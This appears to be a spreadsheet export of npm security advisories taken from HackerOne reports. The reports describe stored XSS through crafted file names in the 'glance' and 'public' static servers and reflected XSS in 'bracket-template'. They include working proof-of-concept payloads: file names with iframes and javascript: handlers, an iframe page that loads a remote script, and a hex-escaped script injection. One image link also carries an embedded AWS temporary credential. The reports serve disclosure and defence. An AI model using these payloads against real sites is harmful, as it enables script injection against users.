    <t xml:space="preserve">Hi Guys,  Stored XSS vulnerability glance module. File name, contains malicious HTML (eg. embedded iframe element javascript  pseudoprotocol handler  element) allows execute JavaScript code against user opens directory listing contains crafted file name.   Module  glance  quick disposable http server static files  https //www.npmjs.com/package/glance  Stats 33 downloads last day 34 downloads last week 269 downloads last month  ~3000 estimated downloads per year  Description  glance serves files server installed. no file names sanitization, following names used    example file name 1  iframe element serving HTML file malicious JavaScript fired when iframe loads its content   Â« Â»   malicious_iframe.html example              Frame embeded malware  P        iframe element malicious code            example file name 2  inline javascript  pseudo protocol event handler   javascript alert("you pwned ")  When user clicks file, instead seeing its content, malicious JavaScript executed  Steps Reproduce    install glance   $ npm install glance   directory will served via glance, put file following name   javascript alert("you pwned ")   run glance selected direcotry   ~/playground/hackerone/Node$ ./node_modules/glance/bin/glance.js   verbose   dir ./  will list files. Now, click file javascript alert("you pwned ") name. JavaScript executed popup fired     Supporting Material/References    Ubuntu 16.04 LTS Chromium 66.0.3333.0 (Developer Build) (64 bit)  version  v8.9.4 LTS npm version  5.6.0 curl 7.47.0   Please feel free invite module maintainer report. haven"t contacted maintainer want keep process fixing disclosing bug consistent HackerOne platform only.  hope report will help keep ecosystem its users safe future.  Regards,  Rafal "bl4de" Janicki  Impact  vulnerability used attacker serve malicious JavaScript against user. </t>
  </si>
  <si>
    <t>vulnerability used attacker serve malicious JavaScript against user.</t>
  </si>
  <si>
    <t>[public] Stored XSS in filenames in directory served by public</t>
  </si>
  <si>
    <t>/advisories/609</t>
  </si>
  <si>
    <t>2018-04-25T05:36:26.429+00:00</t>
  </si>
  <si>
    <t>public</t>
  </si>
  <si>
    <t>https://www.npmjs.com/public</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/316346.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi Guys,&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;public&lt;/strong&gt; allows to embed HTML in file names, which (in certain conditions) might lead to execute malicious JavaScript.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;I put &lt;a title="https://www.npmjs.com/package/public" href="/redirect?signature=da365f297128026fba5a0422d8501e2b72703e8e&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2Fpublic" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://www.npmjs.com/package/public&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt; in Weakness section - &amp;#39;Where is the stored content accessible?*&amp;#39; because it does not allowed me to open report with &lt;a title="http://localhost:8000" href="/redirect?signature=9c41384d86b33f1fccc4fea471f14b416efc2594&amp;amp;url=http%3A%2F%2Flocalhost%3A8000" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;http://localhost:8000&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt; - so it&amp;#39;s only a placeholder and does not contain any vulnerability!!!&lt;/strong&gt;&lt;/p&gt;
&lt;h2 id="module"&gt;Module&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;public&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Run static file hosting server with specified public dir &amp;amp; port. Support a &amp;quot;direcotry index&amp;quot; like Apache httpd.&lt;/p&gt;
&lt;p&gt;&lt;a title="https://www.npmjs.com/package/public" href="/redirect?signature=da365f297128026fba5a0422d8501e2b72703e8e&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2Fpublic" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://www.npmjs.com/package/public&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;version: 0.1.3&lt;/p&gt;
&lt;p&gt;Stats&lt;br&gt;
2 downloads in the last day&lt;br&gt;
28 downloads in the last week&lt;br&gt;
222 downloads in the last month&lt;/p&gt;
&lt;p&gt;~2600 estimated downloads per year&lt;/p&gt;
&lt;h2 id="description"&gt;Description&lt;/h2&gt;
&lt;p&gt;This vulnerability exists, because &lt;code&gt;file&lt;/code&gt; which represents filename(s) is output in HTML without any sanitization. &lt;br&gt;
This allows to embed malicious code in filenames listed in directory.&lt;/p&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// node_modules/public/bin/public, line 106:&lt;/span&gt;
        &lt;span class="nx"&gt;files&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;forEach&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;file&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="nx"&gt;list&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;push&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&amp;lt;li&amp;gt;&amp;lt;a href=&amp;quot;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;path&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;base&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;file&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&amp;quot;&amp;gt;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;file&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;});&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="poc-steps-to-reproduce"&gt;PoC - Steps To Reproduce:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;install &lt;code&gt;public&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ npm install public
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;in the directory which will be served via &lt;code&gt;public&lt;/code&gt;, create file with following name:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;quot;&amp;gt;&amp;lt;iframe src=&amp;quot;malware_frame.html&amp;quot;&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;create second file with name &lt;code&gt;malware_frame.html&lt;/code&gt; with following content and save it in the same directory:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight html"&gt;&lt;code&gt;&lt;span class="nt"&gt;&amp;lt;html&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;head&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;meta&lt;/span&gt; &lt;span class="na"&gt;charset=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;utf8&amp;quot;&lt;/span&gt; &lt;span class="nt"&gt;/&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;title&amp;gt;&lt;/span&gt;Frame embeded with malware :P&lt;span class="nt"&gt;&amp;lt;/title&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/head&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;body&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;p&amp;gt;&lt;/span&gt;iframe element with malicious code&lt;span class="nt"&gt;&amp;lt;/p&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;script &lt;/span&gt;&lt;span class="na"&gt;type=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;text/javascript&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;src=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;http://bl4de.tech/poc.js&amp;quot;&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&amp;lt;/script&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/body&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/html&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Run `&lt;code&gt;public&lt;/code&gt; in directory with file with changed filename:&lt;/p&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ ./node_modules/public/bin/public ./ 8000
Public.js server running with &amp;quot;/Users/bl4de/playground/node_bugbounty_playground&amp;quot; on port 8000
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and open &lt;code&gt;http://127.0.0.1:8000&lt;/code&gt; in the browser:&lt;/p&gt;
&lt;p&gt;&lt;a href="#" class="markdown-attachment-link markdown-attachment-inline-reference" data-attachment-filename="1.png" data-attachment-link="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/263/608/f1887e282f9c1632452e2193fd5d5d4fd89d4cc1/1.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7a03d1078573df48f46655c206a73ee27054bff48682d50058df85bc3170bb17" data-attachment-type="image/png"&gt;&lt;img src="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/263/608/f1887e282f9c1632452e2193fd5d5d4fd89d4cc1/1.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7a03d1078573df48f46655c206a73ee27054bff48682d50058df85bc3170bb17" class="markdown-inline-image"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;p&gt;Configuration I&amp;#39;ve used to find this vulnerability:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;macOS HighSierra 10.13.3&lt;/li&gt;
&lt;li&gt;node 8.9.3&lt;/li&gt;
&lt;li&gt;npm 5.5.1&lt;/li&gt;
&lt;li&gt;Chromium 66.0.3342.0&lt;/li&gt;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&lt;p&gt;This vulnerability can be used to eg. download malware via &amp;quot;drive-by-download&amp;quot; attacks. Also, as described in other modules I&amp;#39;ve reported similar vulnerabilty, an iframe with malicious JS file loaded from external resource can be executed.&lt;/p&gt;
&lt;p&gt;The hacker selected the &lt;strong&gt;Cross-site Scripting (XSS) - Stored&lt;/strong&gt; weakness. This vulnerability type requires contextual information from the hacker. They provided the following answers:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;URL&lt;/strong&gt;&lt;br&gt;
&lt;a title="https://www.npmjs.com/package/public" href="/redirect?signature=da365f297128026fba5a0422d8501e2b72703e8e&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2Fpublic" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://www.npmjs.com/package/public&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Verified&lt;/strong&gt;&lt;br&gt;
Yes&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-02-15T08:03:19.889Z</t>
  </si>
  <si>
    <t>2018-04-15T18:32:14.574Z</t>
  </si>
  <si>
    <t>This vulnerability can be used to eg. download malware via "drive-by-download" attacks. Also, as described in other modules I've reported similar vulnerabilty, an iframe with malicious JS file loaded from external resource can be executed.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Guys,  public allows embed HTML file names, (in certain conditions) lead execute malicious JavaScript.  put https //www.npmjs.com/package/public Weakness section   "Where stored content accessible?*" does not allowed open report http //localhost 8000   so it"s placeholder does not contain vulnerability     Module  public  Run static file hosting server specified public dir &amp;amp; port. Support Â« Â»direcotry indexÂ« Â» Apache httpd.  https //www.npmjs.com/package/public  version  0.1.3  Stats 2 downloads last day 28 downloads last week 222 downloads last month  ~2600 estimated downloads per year  Description  vulnerability exists, file represents filename(s) output HTML without sanitization.  allows embed malicious code filenames listed directory. // node_modules/public/bin/public, line 106          files.forEach(function(file) {             list.push("", file, "");         });  PoC   Steps Reproduce    install public   $ npm install public   directory will served via public, create file following name   Â« Â»    create second file name malware_frame.html following content save directory               Frame embeded malware  P        iframe element malicious code          Run `public directory file changed filename  $ ./node_modules/public/bin/public ./ 8000 server running Â« Â»/Users/bl4de/playground/node_bugbounty_playgroundÂ« Â» port 8000  open http //127.0.0.1 8000 browser     Supporting Material/References   Configuration I"ve used find vulnerability    macOS HighSierra 10.13.3 node 8.9.3 npm 5.5.1 Chromium 66.0.3342.0   Wrap  hope report will help keep Node ecosystem safe. questions details finding, please let know comment.  Thank  Regards,  Rafal "bl4de" Janicki  Impact  vulnerability used eg. download malware via Â« Â»drive downloadÂ« Â» attacks. Also, described modules I"ve reported similar vulnerabilty, iframe malicious JS file loaded external resource executed.  hacker selected Cross site Scripting (XSS)   Stored weakness. vulnerability type requires contextual information hacker. provided following answers   URL https //www.npmjs.com/package/public  Verified Yes </t>
  </si>
  <si>
    <t>vulnerability used eg. download malware via "drive-by-download" attacks. Also, described modules I've reported similar vulnerabilty, iframe malicious JS file loaded external resource executed.</t>
  </si>
  <si>
    <t>[bracket-template] Reflected XSS possible when variable passed via GET parameter is used in template</t>
  </si>
  <si>
    <t>/advisories/608</t>
  </si>
  <si>
    <t>2018-04-25T05:32:13.041+00:00</t>
  </si>
  <si>
    <t>bracket-template</t>
  </si>
  <si>
    <t>https://www.npmjs.com/bracket-template</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/317125.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi Guys,&lt;/p&gt;
&lt;p&gt;I would like to report Reflected XSS in bracket-template module.&lt;br&gt;
It allows to inject arbitrary JavaScript tag and malicious code to execute when variables read from GET are used directly in template without sanitization.&lt;/p&gt;
&lt;h2 id="module"&gt;Module&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;module name:&lt;/strong&gt; bracket-template&lt;br&gt;
&lt;strong&gt;version:&lt;/strong&gt; 1.1.5&lt;br&gt;
&lt;strong&gt;npm page:&lt;/strong&gt; &lt;a title="https://www.npmjs.com/package/bracket-template" href="/redirect?signature=b31e2a00f66648efb86d0467d5fcae615ab2ae74&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2Fbracket-template" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://www.npmjs.com/package/bracket-template&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="description"&gt;Description&lt;/h3&gt;
&lt;p&gt;Minimal (Ã¼ber fast) Javascript engine compatible with node.js and browsers.&lt;/p&gt;
&lt;h3 id="module-stats"&gt;Module Stats&lt;/h3&gt;
&lt;p&gt;Stats:&lt;/p&gt;
&lt;p&gt;51 downloads in the last day&lt;br&gt;
209 downloads in the last week&lt;br&gt;
835 downloads in the last month&lt;/p&gt;
&lt;p&gt;~10000 estimated downloads per year&lt;/p&gt;
&lt;h2 id="description"&gt;Description&lt;/h2&gt;
&lt;p&gt;While testing &lt;code&gt;bracket-template&lt;/code&gt; module, I&amp;#39;ve found that there is possibility to inject malicious &lt;code&gt;&amp;lt;script&amp;gt;&lt;/code&gt; tag followed by JavaScript code when values passed via GET are used in templates directly, without any sanitization.&lt;/p&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;install &lt;code&gt;bracket-template&lt;/code&gt; module:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ npm install bracket-template
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;create sample aaplication, which reads &lt;code&gt;name&lt;/code&gt; from url and displays welcome message in the browser:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// app.js file&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;http&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;http&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;bracket&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;bracket-template&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="k"&gt;default&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;port&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;8080&lt;/span&gt;
&lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nx"&gt;createHTML&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;name&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kd"&gt;let&lt;/span&gt; &lt;span class="nx"&gt;tpl&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;`
        [[ const n = &amp;#39;&lt;/span&gt;&lt;span class="p"&gt;${&lt;/span&gt;&lt;span class="nx"&gt;name&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;&amp;#39;; ]]
        &amp;lt;strong&amp;gt;Hello [[= n ]]&amp;lt;/strong&amp;gt;
    `&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;bracket&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;compile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;tpl&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;requestHandler&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;request&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;response&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;name&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;request&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;url&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;split&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;=&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
    &lt;span class="nx"&gt;response&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;writeHeader&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;200&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Content-Type&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;text/html&amp;quot;&lt;/span&gt; &lt;span class="p"&gt;});&lt;/span&gt;
    &lt;span class="nx"&gt;response&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;createHTML&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;name&lt;/span&gt;&lt;span class="p"&gt;)());&lt;/span&gt;
    &lt;span class="nx"&gt;response&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;end&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;server&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;http&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;createServer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;requestHandler&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="nx"&gt;server&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;listen&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;port&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;`server is listening on &lt;/span&gt;&lt;span class="p"&gt;${&lt;/span&gt;&lt;span class="nx"&gt;port&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;`&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;})&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;run application:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ node app.js
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;open &lt;code&gt;http://localhost:8080?name=bl4de&lt;/code&gt; in the browser. You will notice expected result:&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href="#" class="markdown-attachment-link markdown-attachment-inline-reference" data-attachment-filename="1.png" data-attachment-link="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/264/368/5404583ac56a8e64b69905947920c21c08640253/1.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ae9779e1796252872e50551c658cd28bb66fefe230e4530ce95a8ca955a54e6d" data-attachment-type="image/png"&gt;&lt;img src="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/264/368/5404583ac56a8e64b69905947920c21c08640253/1.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ae9779e1796252872e50551c658cd28bb66fefe230e4530ce95a8ca955a54e6d" class="markdown-inline-image"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;now, try to inject following malicious XSS payload: &lt;code&gt;http://localhost:8080?name=bl4de&amp;lt;script&amp;gt;console.log(&amp;#39;XSS?&amp;#39;)&amp;lt;/script&amp;gt;&lt;/code&gt;. You will notice all HTML special characters were escaped:&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href="#" class="markdown-attachment-link markdown-attachment-inline-reference" data-attachment-filename="2.png" data-attachment-link="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/264/369/380fbd02d94f877178129f6ec4c2a0bc011e5fbe/2.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11d440b2c4c0139dc6356bc8af3f80a87e0d1d9cd4d5beae2bc7f4eb9ed2b791" data-attachment-type="image/png"&gt;&lt;img src="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/264/369/380fbd02d94f877178129f6ec4c2a0bc011e5fbe/2.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11d440b2c4c0139dc6356bc8af3f80a87e0d1d9cd4d5beae2bc7f4eb9ed2b791" class="markdown-inline-image"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;this time, use following payload: &lt;code&gt;http://localhost:8080/?name=bl4de\x3cscript\x3econsole.log(\x22uh\x20oh,\x20XSS...\x20:(\x22)\x3c\x2fscript\x3e&lt;/code&gt; and see the result in browser dev tools console:&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href="#" class="markdown-attachment-link markdown-attachment-inline-reference" data-attachment-filename="3.png" data-attachment-link="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/264/370/476deed12b4d2d1b03e8420ba470c80f8c1b2cf8/3.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9e46f5fe2523a435b0ea313a438195d574dec387ad5e6f4763b7c9efe2f70d33" data-attachment-type="image/png"&gt;&lt;img src="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/264/370/476deed12b4d2d1b03e8420ba470c80f8c1b2cf8/3.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;amp;X-Amz-Credential=ASIAIFRJ36RFGDYJRBGA%2F20180703%2Fus-west-2%2Fs3%2Faws4_request&amp;amp;X-Amz-Date=20180703T075035Z&amp;amp;X-Amz-Expires=3600&amp;amp;X-Amz-Security-Token=FQoDYXdzEFgaDOJSDGLlPijmzUNoyCK3A4ef%2BPJkzHbkgJQaNlJ0V8%2BHvtrg75l811WdLRytQGJ6fPK%2FaDPgCm36BtlSMFY%2BcX3Qnzmd7Im1IjXNR8%2FdEfHHmR%2FTLYNVzDDTcBFztfYdu7Jp9yaq6t8mAJ4JnnRliBVJRZqY69IGdGTrhRFFfYAytaJOvFzGbmgw%2F%2BVvcTTURrTxNgR3w8tZvxIsjhrzkgrEIfwBidbjJRynNL8lZdgGOrrzJEw9lPgix5k7pKRL9DNf9uHi6bcOWTOYXU6Cyl%2FeJvTSf48T8c%2BunaqiBrvLt1yOXwAN%2BsQjDr%2FMn2MiWFVHpI1ohqmgNf8CPL2gmGFhvXnAbLDfmI56b0u6RNZq0axhCikjCfMkg3X8j5RWEDpy%2BY6y1DWnr6bmCDqxdbYJdSg4PasGvP2Ox4m9BAoWZDbVZNUtcHxnmsG7emDqNqXdWu3Ic7ahuCMsq3E9AvyOHF1myAy9tFa7EMsu%2BmP9PmOlaQoz8sWtIY7W8PcVuYREFJjVWG0bvtuIjr3Y8PKxbsPSx3q0UtaFELbs7zBf%2BDYRheyPD1LHzTEkKhVRwPNW27W8mQTFrX4YMqntHhvIqukFmM0om7%2Fs2QU%3D&amp;amp;X-Amz-SignedHeaders=host&amp;amp;X-Amz-Signature=9e46f5fe2523a435b0ea313a438195d574dec387ad5e6f4763b7c9efe2f70d33" class="markdown-inline-image"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;When we investigate HTML returned from the server, we can notice using &lt;code&gt;\x[hex][hex]&lt;/code&gt; notation allows to inject any HTML special character and crafts XSS payload:&lt;/p&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;strong&amp;gt;Hello bl4de&amp;lt;script&amp;gt;console.log(&amp;quot;uh oh, XSS... :(&amp;quot;)&amp;lt;/script&amp;gt;&amp;lt;/strong&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Also, I have noticed that this vector is not detected by built-in XSS protection (XSS Auditor) in Blink/WebKit based browsers (Chromium, Safari, Chrome, Opera), which causes additional risk for anyone who uses &lt;code&gt;bracket-template&lt;/code&gt; in production application.&lt;/p&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;p&gt;This issue was found and tested with following setup:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;macOS HighSierra 10.13.3&lt;/li&gt;
&lt;li&gt;Node.js v.8.9.3&lt;/li&gt;
&lt;li&gt;npm v. 5.5.1&lt;/li&gt;
&lt;li&gt;Chromium 66.0.3342.0, Safari 11.03 (with XSS Auditor enabled), Chrome 64.0.3282.167 (with XSS Auditor enabled)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="wrap-up"&gt;Wrap up&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;I contacted the maintainer to let him know: No&lt;/li&gt;
&lt;li&gt;I opened an issue in the related repository: No&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Regards,&lt;/p&gt;
&lt;p&gt;Rafal &amp;#39;bl4de&amp;#39; Janicki&lt;/p&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
